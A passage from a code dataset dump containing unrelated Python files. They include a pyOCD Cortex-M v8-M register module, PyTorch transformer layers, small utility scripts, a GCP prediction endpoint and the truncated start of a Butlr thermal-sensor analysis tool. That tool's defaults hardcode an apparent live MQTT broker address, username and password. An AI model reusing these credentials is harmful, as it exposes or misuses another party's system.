   MVFR1_MVE_SHIFT = 8\n    MVFR1_MVE__INTEGER = 0x1\n    MVFR1_MVE__FLOAT = 0x2\n    MVFR1_FP16_MASK = 0x00f00000\n    MVFR1_FP16_SHIFT = 20\n    MVFR1_FP16__SUPPORTED = 0x1 # FP16 format support is present.\n\n    # Instruction Set Attribute Register 0\n    ISAR0 = 0xE000ED60\n    ISAR0_CMPBRANCH_MASK = 0x0000f000\n    ISAR0_CMPBRANCH_SHIFT = 12\n    ISAR0_CMPBRANCH__LOB = 0x3 # LOB instructions from v8.1-M are present.\n\n    # Instruction Set Attribute Register 5\n    ISAR5 = 0xE000ED74\n    ISAR5_PACBTI_MASK = 0x00f00000\n    ISAR5_PACBTI_SHIFT = 20\n    ISAR5_PACBTI__NONE = 0x0 # PACBTI is not 
present.\n\n # PMU Type register\n PMU_TYPE = 0xE0003E00\n PMU_TYPE_N_MASK = 0x0000000f\n\n def __init__(self, rootTarget, ap, memory_map=None, core_num=0, cmpid=None, address=None):\n super().__init__(rootTarget, ap, memory_map, core_num, cmpid, address)\n\n @property\n def supported_security_states(self):\n \"\"\"@brief Tuple of security states supported by the processor.\n\n @return Tuple of @ref pyocd.core.target.Target.SecurityState \"Target.SecurityState\". The\n result depends on whether the Security extension is enabled.\n \"\"\"\n if self.has_security_extension:\n return (Target.SecurityState.NONSECURE, Target.SecurityState.SECURE)\n else:\n return (Target.SecurityState.NONSECURE,)\n\n def _read_core_type(self):\n \"\"\"@brief Read the CPUID register and determine core type and architecture.\"\"\"\n # Schedule deferred reads.\n cpuid_cb = self.read32(self.CPUID, now=False)\n pfr0_cb = self.read32(self.PFR0, now=False)\n pfr1_cb = self.read32(self.PFR1, now=False)\n dfr0_cb = self.read32(self.DFR0, now=False)\n isar0_cb = self.read32(self.ISAR0, now=False)\n isar3_cb = self.read32(self.ISAR3, now=False)\n isar5_cb = self.read32(self.ISAR5, now=False)\n pmu_type_cb = self.read32(self.PMU_TYPE, now=False)\n mpu_type_cb = self.read32(self.MPU_TYPE, now=False)\n\n # Read CPUID register\n cpuid = cpuid_cb()\n implementer = (cpuid & CortexM.CPUID_IMPLEMENTER_MASK) >> CortexM.CPUID_IMPLEMENTER_POS\n arch = (cpuid & CortexM.CPUID_ARCHITECTURE_MASK) >> CortexM.CPUID_ARCHITECTURE_POS\n self.core_type = (cpuid & CortexM.CPUID_PARTNO_MASK) >> CortexM.CPUID_PARTNO_POS\n self.cpu_revision = (cpuid & CortexM.CPUID_VARIANT_MASK) >> CortexM.CPUID_VARIANT_POS\n self.cpu_patch = (cpuid & CortexM.CPUID_REVISION_MASK) >> CortexM.CPUID_REVISION_POS\n\n # Check for DSP extension\n isar3 = isar3_cb()\n isar3_simd = (isar3 & self.ISAR3_SIMD_MASK) >> self.ISAR3_SIMD_SHIFT\n if isar3_simd == self.ISAR3_SIMD__DSP:\n self._extensions.append(CortexMExtension.DSP)\n\n # Check for RAS extension.\n pfr0 = pfr0_cb()\n pfr0_ras = (pfr0 & self.PFR0_RAS_MASK) >> self.PFR0_RAS_SHIFT\n if pfr0_ras == self.PFR0_RAS_VERSION_1:\n self._extensions.append(CortexMExtension.RAS)\n\n # Check for the security extension.\n pfr1 = pfr1_cb()\n pfr1_sec = (pfr1 & self.PFR1_SECURITY_MASK) >> self.PFR1_SECURITY_SHIFT\n self.has_security_extension = pfr1_sec in (self.PFR1_SECURITY_EXT_V8_0, self.PFR1_SECURITY_EXT_V8_1)\n if self.has_security_extension:\n self._extensions.append(CortexMExtension.SEC)\n if pfr1_sec == self.PFR1_SECURITY_EXT_V8_1:\n self._extensions.append(CortexMExtension.SEC_V81)\n\n # Check for UDE extension.\n dfr0 = dfr0_cb()\n dfr0_ude = (dfr0 & self.DFR0_UDE_MASK) >> self.DFR0_UDE_SHIFT\n if dfr0_ude == self.DFR0_UDE_SUPPORTED:\n self._extensions.append(CortexMExtension.UDE)\n\n # Check for PACBTI extension.\n isar5 = isar5_cb()\n isar5_pacbti = (isar5 & self.ISAR5_PACBTI_MASK) >> self.ISAR5_PACBTI_SHIFT\n if isar5_pacbti != self.ISAR5_PACBTI__NONE:\n self._extensions.append(CortexMExtension.PACBTI)\n\n # Check for PMU extension.\n pmu_type = pmu_type_cb()\n pmu_type_n = pmu_type & self.PMU_TYPE_N_MASK\n if pmu_type_n > 0:\n self._extensions.append(CortexMExtension.PMU)\n\n # Check for MPU extension\n mpu_type = mpu_type_cb()\n mpu_type_dregions = (mpu_type & self.MPU_TYPE_DREGIONS_MASK) >> self.MPU_TYPE_DREGIONS_SHIFT\n if mpu_type_dregions > 0:\n self._extensions.append(CortexMExtension.MPU)\n\n # Determine the base/main variant.\n if arch == self.ARMv8M_BASE:\n self._architecture = CoreArchitecture.ARMv8M_BASE\n 
else:\n self._architecture = CoreArchitecture.ARMv8M_MAIN\n\n # Determine the architecture major/minor version.\n # The presence of low-overhead loop and branch instructions is used to distinguish v8.1-M from v8.0-M.\n isar0 = isar0_cb()\n isar0_cmpbranch = (isar0 & self.ISAR0_CMPBRANCH_MASK) >> self.ISAR0_CMPBRANCH_SHIFT\n if isar0_cmpbranch == self.ISAR0_CMPBRANCH__LOB:\n self._arch_version = (8, 1)\n else:\n self._arch_version = (8, 0)\n\n self._core_name = CORE_TYPE_NAME.get((implementer, self.core_type), f\"Unknown (CPUID={cpuid:#010x})\")\n\n def _check_for_fpu(self):\n \"\"\"@brief Determine if a core has an FPU.\n\n In addition to the tests performed by CortexM, this method tests for the MVE extension.\n \"\"\"\n # Schedule this deferred read before calling the super implementation.\n mvfr1_cb = self.read32(self.MVFR1, now=False)\n\n super()._check_for_fpu()\n\n # Check for MVE.\n mvfr1 = mvfr1_cb()\n mve = (mvfr1 & self.MVFR1_MVE_MASK) >> self.MVFR1_MVE_SHIFT\n if mve == self.MVFR1_MVE__INTEGER:\n self._extensions.append(CortexMExtension.MVE)\n elif mve == self.MVFR1_MVE__FLOAT:\n self._extensions += [CortexMExtension.MVE, CortexMExtension.MVE_FP]\n\n # Check for half-precision FP.\n fp16 = (mvfr1 & self.MVFR1_FP16_MASK) >> self.MVFR1_FP16_SHIFT\n if fp16 == self.MVFR1_FP16__SUPPORTED:\n self._extensions.append(CortexMExtension.FPU_HP)\n\n def _build_registers(self):\n super()._build_registers()\n\n # Registers available with Security extension, either Baseline or Mainline.\n if self.has_security_extension:\n self._core_registers.add_group(CoreRegisterGroups.V8M_SEC_ONLY)\n\n # Mainline-only registers.\n if self.architecture == CoreArchitecture.ARMv8M_MAIN:\n self._core_registers.add_group(CoreRegisterGroups.V7M_v8M_ML_ONLY)\n\n # Registers available when both Mainline and Security extensions are implemented.\n if self.has_security_extension:\n self._core_registers.add_group(CoreRegisterGroups.V8M_ML_SEC_ONLY)\n\n # MVE registers.\n if CortexMExtension.MVE in self.extensions:\n self._core_registers.add_group(CoreRegisterGroups.V81M_MVE_ONLY)\n\n def get_security_state(self):\n \"\"\"@brief Returns the current security state of the processor.\n\n @return @ref pyocd.core.target.Target.SecurityState \"Target.SecurityState\" enumerator.\n \"\"\"\n dscsr = self.read32(self.DSCSR)\n if (dscsr & self.DSCSR_CDS) != 0:\n return Target.SecurityState.SECURE\n else:\n return Target.SecurityState.NONSECURE\n\n def clear_debug_cause_bits(self):\n self.write32(CortexM.DFSR,\n self.DFSR_PMU\n | CortexM.DFSR_EXTERNAL\n | CortexM.DFSR_VCATCH\n | CortexM.DFSR_DWTTRAP\n | CortexM.DFSR_BKPT\n | CortexM.DFSR_HALTED)\n\n def get_halt_reason(self):\n \"\"\"@brief Returns the reason the core has halted.\n\n This overridden version of this method adds support for v8.x-M halt reasons.\n\n @return @ref pyocd.core.target.Target.HaltReason \"Target.HaltReason\" enumerator or None.\n \"\"\"\n dfsr = self.read32(self.DFSR)\n if dfsr & self.DFSR_HALTED:\n reason = Target.HaltReason.DEBUG\n elif dfsr & self.DFSR_BKPT:\n reason = Target.HaltReason.BREAKPOINT\n elif dfsr & self.DFSR_DWTTRAP:\n reason = Target.HaltReason.WATCHPOINT\n elif dfsr & self.DFSR_VCATCH:\n reason = Target.HaltReason.VECTOR_CATCH\n elif dfsr & self.DFSR_EXTERNAL:\n reason = Target.HaltReason.EXTERNAL\n elif dfsr & self.DFSR_PMU:\n reason = Target.HaltReason.PMU\n else:\n reason = None\n return 
reason\n\n","repo_name":"pyocd/pyOCD","sub_path":"pyocd/coresight/cortex_m_v8m.py","file_name":"cortex_m_v8m.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","stars":986,"dataset":"github-code","pt":"19"} +{"seq_id":"8162011902","text":"from typing import Optional\nfrom torch import Tensor\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport math\nimport copy\n\nclass ResBlock(nn.Module):\n def __init__(self, n_dim):\n super(ResBlock, self).__init__()\n\n self.n_dim = n_dim\n\n self.fc1 = nn.Linear(n_dim, n_dim)\n self.fc2 = nn.Linear(n_dim, n_dim)\n self.acfun = nn.LeakyReLU()\n\n def forward(self, x0):\n\n x = self.acfun(self.fc1(x0))\n x = self.acfun(self.fc2(x))\n x = x+x0\n return x\n\nclass TransformerEncoderLayer(nn.Module):\n r\"\"\"TransformerEncoderLayer is made up of self-attn and feedforward network.\n This standard encoder layer is based on the paper \"Attention Is All You Need\".\n Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n Neural Information Processing Systems, pages 6000-6010. Users may modify or implement\n in a different way during application.\n\n Args:\n d_model: the number of expected features in the input (required).\n nhead: the number of heads in the multiheadattention models (required).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of the intermediate layer, can be a string\n (\"relu\" or \"gelu\") or a unary callable. Default: relu\n layer_norm_eps: the eps value in layer normalization components (default=1e-5).\n batch_first: If ``True``, then the input and output tensors are provided\n as (batch, seq, feature). 
Default: ``False``.\n\n Examples::\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n >>> src = torch.rand(10, 32, 512)\n >>> out = encoder_layer(src)\n\n Alternatively, when ``batch_first`` is ``True``:\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=True)\n >>> src = torch.rand(32, 10, 512)\n >>> out = encoder_layer(src)\n \"\"\"\n __constants__ = ['batch_first', 'norm_first']\n\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.relu,\n layer_norm_eps=1e-5, batch_first=False,\n device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(TransformerEncoderLayer, self).__init__()\n self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first, \n **factory_kwargs)\n # Implementation of Feedforward model\n self.linear1 = nn.Linear(d_model, dim_feedforward, **factory_kwargs)\n self.dropout = nn.Dropout(dropout)\n self.linear2 = nn.Linear(dim_feedforward, d_model, **factory_kwargs)\n\n self.norm_first = False\n self.norm1 = nn.LayerNorm(d_model, eps=layer_norm_eps, **factory_kwargs)\n self.norm2 = nn.LayerNorm(d_model, eps=layer_norm_eps, **factory_kwargs)\n self.dropout1 = nn.Dropout(dropout)\n self.dropout2 = nn.Dropout(dropout)\n\n # Legacy string support for activation function.\n if isinstance(activation, str):\n self.activation = _get_activation_fn(activation)\n else:\n self.activation = activation\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu\n super(TransformerEncoderLayer, self).__setstate__(state)\n\n def forward(self, src: Tensor, src_mask: Optional[Tensor] = None, src_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the input through the encoder layer.\n\n Args:\n src: the sequence to the encoder layer (required).\n src_mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n\n # see Fig. 
1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = src\n if self.norm_first:\n x = x + self._sa_block(self.norm1(x), src_mask, src_key_padding_mask)\n x = x + self._ff_block(self.norm2(x))\n else:\n atten_output, atten_score = self._sa_block(x, src_mask, src_key_padding_mask)\n x = self.norm1(x + atten_output)\n x = self.norm2(x + self._ff_block(x))\n\n return x, atten_score\n\n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n # x = self.self_attn(x, x, x,\n # attn_mask=attn_mask,\n # key_padding_mask=key_padding_mask,\n # need_weights=False)[0]\n x = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=True)\n # return self.dropout1(x)\n return self.dropout1(x[0]), x[1]\n\n # feed forward block\n def _ff_block(self, x: Tensor) -> Tensor:\n x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n return self.dropout2(x)\n\ndef _get_activation_fn(activation):\n if activation == \"relu\":\n return F.relu\n elif activation == \"gelu\":\n return F.gelu\n\n raise RuntimeError(\"activation should be relu/gelu, not {}\".format(activation))\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, dropout=0.1, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-np.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0).transpose(0, 1)\n \n self.register_buffer('pe', pe)\n\n def forward(self, x):\n # not used in the final model\n x = x + self.pe[:x.shape[0], :]\n return self.dropout(x)\n","repo_name":"Silverster98/HUMANISE","sub_path":"model/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"19"} +{"seq_id":"71084337323","text":"import math\n\n\ndef calculateRows(position, rowAmmount):\n min = 0\n max = rowAmmount\n for letter in position:\n if letter in 'FL':\n max = min + math.floor((max - min) / 2)\n elif letter in 'BR':\n min = min + math.ceil((max - min) / 2)\n return min\n\n\ndef calculatePosition(sit: str):\n row = calculateRows(sit[:7], 127)\n col = calculateRows(sit[7:], 7)\n return row * 8 + col\n\n\nsits = [line.rstrip('\\n') for line in open('data/data.txt')]\n\npositions = []\nfor sit in sits:\n positions.append(calculatePosition(sit))\n\nmin = min(positions)\nmax = max(positions)\n\nfor i in range(min + 1, max - 1):\n if (i not in positions and (i+1) in positions and (i-1) in positions):\n print(i)","repo_name":"Keeeweee/adventOfCode-2020","sub_path":"day-05/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22920939000","text":"# -*- coding: utf-8 -*-\n\nimport torch\nfrom torch.autograd import Variable as V\nimport torchvision.models as models\nfrom torchvision import transforms as trn\nfrom torch.nn import functional as F\nimport os\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport time\n\n\n# th architecture to use\narch = 'resnet50'\n# load the pre-trained weights\nmodel_file = './models/%s_places365.pth.tar' % arch\nmodel = 
models.__dict__[arch](num_classes=365)\ncheckpoint = torch.load(model_file, map_location=lambda storage, loc: storage)\nstate_dict = {str.replace(k,'module.',''): v for k,v in checkpoint['state_dict'].items()}\nmodel.load_state_dict(state_dict)\nmodel.eval()\n\n# load the class label\nfile_name = './categories/categories_places365.txt'\nclasses = list()\nwith open(file_name) as class_file:\n for line in class_file:\n classes.append(line.strip().split(' ')[0][3:])\nclasses = tuple(classes)\n\n\n# load the image transformer\ncentre_crop = trn.Compose([\n trn.Resize((256,256)),\n trn.CenterCrop(224),\n trn.ToTensor(),\n trn.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n\n\n# cap = cv2.VideoCapture('.\\\\imgs\\\\sample.mp4') \ncap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\nframes = 0\nlblDic = {}\nstart = time.time() \nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n frame = cv2.resize(frame,None,fx=0.5, fy=0.5, interpolation = cv2.INTER_CUBIC)\n cv2_im = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n img = Image.fromarray(cv2_im)\n \n input_img = V(centre_crop(img).unsqueeze(0))\n # forward pass\n logit = model.forward(input_img)\n h_x = F.softmax(logit, 1).data.squeeze()\n probs, idx = h_x.sort(0, True)\n preds = ''\n horPos = 10\n verPos = 50\n label = [] \n # output the prediction\n for i in range(0, 5):\n preds = \"{} = {:.3f}\".format(classes[idx[i]],probs[i])\n label.append({classes[idx[i]]:\"{:.3f}\".format(probs[i])})\n cv2.putText(frame,preds,(horPos,verPos), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,255), 2, cv2.LINE_AA)\n verPos += 30\n print(label)\n lblDic[frames] = label\n frames += 1\n print (\"Frames : \"+ str(frames))\n print(\"FPS of the video is {:5.2f}\".format( frames / (time.time() - start)))\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n\nimport json\nwith open('places.json', 'w') as outfile:\n json.dump(lblDic, outfile)\n\n\n# load the test image\n#img_name = './imgs/12.jpg'\n#img = Image.open(img_name)\n#input_img = V(centre_crop(img).unsqueeze(0))\n# forward pass\n#logit = model.forward(input_img)\n#h_x = F.softmax(logit, 1).data.squeeze()\n#probs, idx = h_x.sort(0, True)\n\n#print('{} prediction on {}'.format(arch,img_name))\n# output the prediction\n#for i in range(0, 5):\n# print('{:.3f} -> {}'.format(probs[i], classes[idx[i]]))\n","repo_name":"MorphSeur/SceneRecognition","sub_path":"archive/sceneRecognition.py","file_name":"sceneRecognition.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74429609324","text":"import os\nfrom ftplib import FTP\n\n\ndef main():\n if os.path.exists('patch8.gz'):\n raise IOError('refusing to overwrite your patch8.gz file')\n\n ftp = FTP('ftp.kernel.org')\n ftp.login()\n ftp.cwd('/pub/linux/kernel/v1.0')\n\n with open('patch8.gz', 'wb') as f:\n ftp.retrbinary('RETR patch8.gz', f.write)\n\n ftp.quit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fireinrain/python-network","sub_path":"chapter17/binarydl.py","file_name":"binarydl.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"33708296301","text":"import os\nimport numpy as np\nimport PIL.Image as Image\n\ndef post_process(pred):\n h, w, _ = pred.shape\n pred = pred.reshape((h, w))\n img = Image.fromarray(pred)\n return img\n\ndef 
gen_featuremap(filename, random_interval = False, temporal_rgb_frames = 5):\n    New_image = Image.new('RGB', size = (480, 480))\n    pred_path = '../Human_Parsing/output/' + filename + '.npy'\n    if not os.path.exists(pred_path):\n        return New_image\n    \n    data = np.load(pred_path, allow_pickle = True)\n    num_frames = data.shape[0]\n\n    start = 0\n    sample_interval = num_frames // temporal_rgb_frames\n    if random_interval: sample_interval = np.random.randint(1, num_frames // temporal_rgb_frames + 1)\n    if sample_interval == 0:\n        Func = lambda m, n: [i*n//m + n//(2*m) for i in range(m)]\n        frame_range = Func(temporal_rgb_frames, num_frames)\n    else: frame_range = range(start, num_frames, sample_interval)\n\n    for idx, value in enumerate(frame_range[0:temporal_rgb_frames]):\n        img = post_process(data[value]).resize((int(480/temporal_rgb_frames), 480))\n        New_image.paste(img, (int(480/temporal_rgb_frames)*idx, 0))\n\n    return New_image","repo_name":"liujf69/IPP-Net-Parsing","sub_path":"feeders/gen_parsing.py","file_name":"gen_parsing.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"23947636679","text":"def split_csv(dirName):\n\tfil = 'output/'+dirName+'/members.csv'\n\tcsvfilename = open(fil, 'r').readlines()\n\t# store header values\n\theader = csvfilename[0] \n\t# remove header from list\n\tcsvfilename.pop(0) \n\tfile = 1\n\t# number of lines to be written in each new file\n\trecord_per_file = 50\n\n\tfor j in range(len(csvfilename)):\n\t\tif j % record_per_file == 0:\n\t\t\twrite_file = csvfilename[j:j+record_per_file]\n\t\t\t# add the header at the start of the write_file\n\t\t\twrite_file.insert(0, header)\n\t\t\t# write in file\n\t\t\topen(str(fil.replace('.csv',''))+ str(file) + '.csv', 'w+').writelines(write_file)\n\t\t\tfile += 1\n","repo_name":"Dagimal/telegram-scraper-kit","sub_path":"core/CsvSplitter/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14117790087","text":"# downloading pkl model file from GCP's cloud_storage service node\n# to be able to use here in GCP's app_engine service node\nimport pickle\nfrom google.cloud import storage\nstorage_client = storage.Client()\nbucket = storage_client.get_bucket('model-bucket-iris-sk')\nblob = bucket.blob('Iris_SV_Classfier.pkl')\nblob.download_to_filename('/tmp/Iris_SV_Classfier.pkl')\nmodel = pickle.load(open('/tmp/Iris_SV_Classfier.pkl', 'rb'))\n\n\n#\nimport requests \ndef predict(request):\n    if request.method == 'GET':\n        return 'please send post request!'\n    elif request.method == 'POST':\n        input_paras = request.get_json()\n        \n        sepal_length = input_paras['sepal_length']\n        sepal_width = input_paras['sepal_width']\n        petal_length = input_paras['petal_length']\n        petal_width = input_paras['petal_width']\n        \n        import numpy as np\n        input = np.array([[sepal_length, sepal_width, petal_length, petal_width]]) \n        # so basically, passing this 2d array as input means the inner 1d array in [] is\n        # a single row being sent to the model for prediction\n        \n        prediction = model.predict(input)\n        return str(prediction)","repo_name":"Sarvesh-Kesharwani/HouseDataPrediction_kaggle","sub_path":"Flask/deployment/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"19326692719","text":"from . 
import WaitSecs, GetSecs, PsychPortAudio, PsychHID, IOPort\n\n# Extract their \"main\" function, which is named just like the module,\n# and assign its function handle to a variable named just like the module.\n# This will cause the function handles to shadow the original module, so\n# now the module can be called with (almost) identical syntax as one is\n# used to from Octave or Matlab:\nWaitSecs = getattr(WaitSecs, 'WaitSecs');\nGetSecs = getattr(GetSecs, 'GetSecs');\nPsychPortAudio = getattr(PsychPortAudio, 'PsychPortAudio');\nPsychHID = getattr(PsychHID, 'PsychHID');\nIOPort = getattr(IOPort, 'IOPort');\n","repo_name":"ryankajia/Psychtoolbox-3","sub_path":"PsychPython/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"32264718557","text":"import os\nimport re\nimport ast\nimport sys\nimport json\nimport time\nimport pygame\nimport _thread\nimport argparse\nimport warnings\nimport pygame_gui\nimport numpy as np\nfrom scipy import signal\nfrom collections import deque\nfrom datetime import datetime\nimport paho.mqtt.client as paho\nfrom post_process import live_processing\n\n\ndef analyze(config_json_path=None, floorplan=None, address_dict=None, live=False, display='overlay', fps=10,\n aspect_ratio=(1000, 1000), grid_dimensions=None, data_path=None, det_path=None, post=True, convert='none',\n start_time=0, end_time=np.inf, show_graph=True, graph_path=\"\", replaying=False, rotation=0,\n show_raw_detections=True, mqtt_address=\"ec2-34-222-201-1.us-west-2.compute.amazonaws.com\", mqtt_usn=\"butlr\",\n mqtt_pwd=\"2019Ted/\", mqtt_in=\"butlr/idp_sante/heatic/raw_data\", mqtt_out=\"butlr/idp_sante/heatic/out\",\n mqtt_detections_in=\"butlr/idp_sante/heatic/detection\",\n mqtt_detections_out=\"butlr/idp_sante/heatic/detections_post\"):\n \"\"\"\n :param config_json_path: (string) path to spatial configuration json file\n :param floorplan: (string) path to floorplan png file over which the sensor output will be shown\n :param address_dict: (dictionary) Should be made into a json argument to be loaded. For now, a dictionary of sensor\n names and corresponding deviceNames\n :param live: (bool) Process live data\n :param display: (string) \"grid\"/\"overlay\"/\"none\" --> grid = no floorplan, overlay = floorplan, none = no viz\n :param fps: (int) frames per second for visualization\n :param aspect_ratio: (2-tuple) Aspect ratio of floorplan image in pixels, default (1000x1000)\n :param grid_dimensions: (3-tuple) (# plots in x direction, # plots in y direction, size of individual plot)\n e.g. (6, 2, 100) would be a 2x6 grid of plots each of size 100x100px\n :param data_path: (string) path to saved raw data file\n :param det_path: (string) path to saved detection data file\n :param post: (bool) perform post processing\n :param convert: (str) 'wiwide', 'seamless', 'none'. Changes the way the data are parsed\n :param start_time: (int) Epoch mSec time from which to start analysis\n :param end_time: (int) Epoch mSec time to end analysis\n :param show_graph: (bool) show graph created for post processing\n :param graph_path: (str) path to graph (need not exist yet)\n :param replaying: (bool) data coming from Arihan's replay app. 
Formatting is a little different in this case.\n :param rotation: (float) degrees rotation counterclockwise (IDP --> -90, grid --> 90 or 0.)\n :param show_raw_detections: (bool) show raw detections and post-processed detections simultaneously\n :param mqtt_address: (string) address of broker\n :param mqtt_in: (string) raw data topic\n :param mqtt_out: (string) output topic (currently not used)\n :param mqtt_detections_in: (string) handcraft algorithm detection topic\n :param mqtt_usn: (string) MQTT username\n :param mqtt_pwd: (string) MQTT password\n :param mqtt_detections_out: (string) topic to which post-processed detections will be written\n :return: void\n \"\"\"\n global data_queue\n global detection_queue\n global traj_queue\n global data_queue1\n global detection_queue1\n global post_queue\n global client\n\n global lo\n global hi\n\n global playback\n global text_line\n\n global show_det_local\n global use_delta\n\n lo = 100\n hi = 0\n\n os.environ['TZ'] = 'UTC'\n time.tzset()\n\n data_queue = deque([])\n detection_queue = deque([])\n traj_queue = deque([])\n\n data_queue1 = deque([])\n detection_queue1 = deque([])\n\n post_queue = deque([])\n client = paho.Client()\n\n wiwide = False\n seamless = False\n verizon = False\n if not replaying:\n if convert == 'wiwide':\n wiwide = True\n elif convert == 'seamless':\n seamless = True\n elif convert == 'verizon':\n verizon = True\n\n if config_json_path:\n addresses = {}\n centers = {}\n with open(config_json_path, \"r\") as cfg:\n full_json = json.load(cfg)\n config = full_json['sensors']\n coord_config = full_json['coordinates']\n exit_points = coord_config[0]['exits']\n try:\n rd_key = \"room_dimensions\"\n size_meters = full_json[rd_key]\n except KeyError:\n rd_key = \"room dimensions\"\n size_meters = full_json[rd_key]\n for s in config:\n addresses[s['label']] = s['deviceName']\n centers[s['label']] = s['center']\n print(addresses)\n if display == \"overlay\":\n aspect = aspect_ratio\n scaleX = aspect[0] / 1000\n scaleY = aspect[1] / 1000\n meterX = (aspect[0] / size_meters[0])\n meterY = (aspect[1] / size_meters[1])\n\n sizes, positions, rotations = _sizes_positions(full_json, meterX, meterY, aspect_ratio)\n\n if det_path and not os.path.exists(det_path) and not live:\n # data_converter(data_path, data_path[:-4] + \"_converted.txt\")\n converted = data_path\n sensitivity_params = \"-cr2 0.4 -br2 0.8 -csh -0.8 -bsh -1.2 -csc 0.6 -bsc 0.6 -dr 3,2.5 -dmh both \" \\\n \"-dmc th -thh auto -thc -999 -thstdh 3.5 -thstdc 7.5 \"\n sensitivity_params2 = \"-cr2 0.3 -br2 0.5 -csh -0.5 -bsh -0.7 -csc 0.6 -bsc 0.6 -dmh both \" \\\n \"-dmc th -thh auto -thc -999 -thstdc 7.5 -thstdh 3\"\n if config_json_path:\n config = f\"-wldcd t -scfgp {config_json_path}\"\n else:\n config = \"\"\n\n trk = \"t\" if wiwide else \"f\"\n\n for sensor in addresses.values():\n cmd = f'python3 Butlr_PoC.py -m saved_data -mqid {sensor} -dp {converted} -viz f -pub f -n t -amm t ' \\\n f'-mmdl 10 -imin 5 -imax 25 -wamm 1000 -famm 5 -abg t -rabg 5000 -fabg 10 -lt 100 -vt 10,50 ' \\\n f'-cr2 0.2 -br2 0.2 -csh -0.5 -bsh -0.6 -csc 0.6 -bsc 0.6 -dmh both -dmc th -dr 3,2.5 ' \\\n f'-thh auto -thc auto -thstdc 7.5 -thstdh 3 -ds 0.5001,0.0001 -de 0.5001,0.9999 -dprv 0 -ahr 0 ' \\\n f'-drt f -be f -tshc t -cfo t -wk t -art f -trk {trk} -dtcwf t {config} -dtcwp {det_path}'\n print(\"Running the handcraft algorithm on the provided dataset...\")\n os.system(cmd)\n\n if display != 'none':\n pygame.init()\n\n white = (255, 255, 255)\n black = (0, 0, 0)\n red = (255, 0, 0)\n font = 
pygame.font.Font('font/Consola.ttf', 12)\n clock = pygame.time.Clock()\n\n if live:\n data_type = \"live\"\n else:\n data_type = \"historical\"\n\n if display == 'grid':\n if grid_dimensions is None:\n grid_dimensions = [int(np.around(len(addresses) / 2)), 2, 200]\n box = grid_dimensions[2]\n width = grid_dimensions[0] * box\n height = box * grid_dimensions[1]\n aspect = (width, height)\n font_size = min(12, int(grid_dimensions[2] // 25))\n\n font = pygame.font.Font('font/Consola.ttf', font_size)\n\n disp = pygame.display.set_mode((width, height + (font_size * 3)))\n else:\n if not live:\n disp = pygame.display.set_mode((aspect_ratio[0], int(1.1 * aspect_ratio[1])))\n manager = pygame_gui.UIManager((aspect_ratio[0], int(1.1 * aspect_ratio[1])))\n playback = pygame_gui.elements.UIHorizontalSlider(relative_rect=pygame.Rect((10,\n int(aspect_ratio[1] * 1.02),\n int(aspect_ratio[0] // 2),\n int(aspect_ratio[\n 1] * 1.1 // 20))),\n start_value=0.,\n 